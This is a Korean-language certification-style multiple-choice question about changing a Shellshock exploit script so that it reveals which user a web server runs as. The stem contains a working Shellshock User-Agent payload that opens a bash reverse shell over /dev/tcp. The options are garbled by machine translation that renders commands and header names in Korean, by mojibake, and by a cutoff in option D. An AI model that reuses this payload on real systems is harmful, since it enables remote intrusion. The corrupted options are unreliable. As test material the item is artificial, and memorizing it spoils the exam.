모의 침투 테스트가 10.10.1.1에서 취약한 웹 서버를 발견합니다. 그런 다음 테스터는 웹 익스플로잇을 전송하는 Python 스크립트를 편집하고 다음 코드를 발견합니다: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}다음 중 테스터가 서버가 실행되는 사용자 컨텍스트를 확인하기 위해 스크립트를 수정해야 하는 것은 무엇입니까?
A. xploit = {사용자-에이전트: () { 무시;};/bin/bash -i id;누가미, 수락: 텍스트/html,애플리케이션/xhtml +xml,애플리케이션/xml 문서}
B. xploit = {사용자-에이전트: () { 무시;};/bin/bash -i>& find / -perm -4000, 수락: 텍스트/html,애플리케이션/xhtml +xml,애플리케이션/xmlג}
C. xploit = {사용자-에이전트: () { 무시;};/bin/sh -i ps -efג€ 0>&1, 허용: 텍스트/html,애플리케이션/xhtml +xml,애플리케이션/xmlג€}
D. xploit = {사용자-에이전트: () { 무시;};/bin/bash -i>& /dev/tcp/10